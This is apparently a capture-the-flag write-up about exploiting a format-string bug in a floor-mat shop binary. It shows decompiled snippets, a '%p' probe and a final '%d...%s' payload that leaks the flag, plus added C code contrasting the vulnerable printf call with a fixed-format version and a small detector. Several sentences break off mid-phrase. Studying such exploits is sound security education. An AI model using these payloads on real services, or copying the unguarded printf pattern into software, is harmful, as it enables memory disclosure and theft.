We start by downloading the binary.
We will now use Ghidra to decompile the binary and look at the source code.
After looking a bit at the source code, we find a few interesting snippets.
filep = fopen("flag.txt","r");
This line opens the
if (local_11c == 5) {
fgets(local_d8,0x40,filep);
}
This line reads the
puts("\nEnter your choice:");
__isoc99_scanf(&DAT_001021b6,&local_128);
if ((0 < local_128) && (local_128 < 7)) {
local_11c = local_128 + -1;
}
This line reads the user's choice and stores it in the
Because we want the previous snippet to read the flag, we need to set the
puts("\nPlease enter your shipping address:");
fgets(local_98,0x80,stdin);
puts("\nYour floor mat will be shipped to:\n");
printf(local_98);
This snippet reads the user's shipping address and prints it back to the user. It uses
To test this, we will create a sample
Enter your choice:
6
Please enter your shipping address:
%p
Your floor mat will be shipped to:
0x7fecbda18803
The address that comes back confirms that the printf call is vulnerable. We will now use gdb with pwndbg to examine the stack.
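To make the defect concrete from the defender's side, here is an added example (my own code, not the challenge binary's source) that places the shape Ghidra decompiled, printf(local_98), beside the hardened form that passes the user's input as data under a fixed "%s" format. It also includes a small detector that counts printf conversion directives in untrusted input, which is a cheap validation or log-triage rule. The buffer size 0x80 is taken from the decompilation; the function names and the sample input are assumptions for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not the challenge's own code. Mirrors the 0x80-byte
 * address buffer seen in the decompilation. */
#define ADDR_LEN 0x80

/* Vulnerable shape: the user-controlled string IS the format argument.
 * Compilers flag this (-Wformat-security); the pragma only silences the
 * warning so the contrast compiles. In a real build, keep the warning and
 * make it fatal with -Werror=format-security. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
void ship_notice_vulnerable(const char *addr)
{
    puts("\nYour floor mat will be shipped to:\n");
    printf(addr);   /* "%p" here leaks stack contents, "%s" can read memory */
}
#pragma GCC diagnostic pop

/* Hardened shape: fixed format string, user data passed as an argument.
 * Writes the notice into out (capacity n) and returns the length the full
 * notice needs, like snprintf, so the caller can detect truncation. */
int ship_notice_safe(char *out, size_t n, const char *addr)
{
    return snprintf(out, n, "Your floor mat will be shipped to:\n%s", addr);
}

/* Count printf conversion directives in untrusted input. "%%" is a literal
 * percent sign and is not counted; any other '%' starts a directive. */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent: skip both characters */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char addr[ADDR_LEN];
    char out[256];

    /* Constructed sample input: the same probe the writeup sends */
    strcpy(addr, "%p");

    ship_notice_safe(out, sizeof out, addr);
    printf("%s\n", out);    /* prints the literal "%p"; nothing is leaked */
    printf("directives in input: %d\n", count_format_directives(addr));
    return 0;
}
```

The hardened function is the one-line fix for the snippet above: the only change is moving the user's buffer out of the format position. The detector is not a substitute for that fix, but a count greater than zero on a shipping-address field is a reasonable thing to alert on.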
We will set our breakpoint at the
If we look at the stack we can see
Our final input will be
If we run this locally we get the following output:
Enter your choice:
6
Please enter your shipping address:
%d%d%d%d%d%d%d%d%d%s
Your floor mat will be shipped to:
-10346311650-1035535616614400-1649304040061000EXAMPLEFLAG
Let's connect to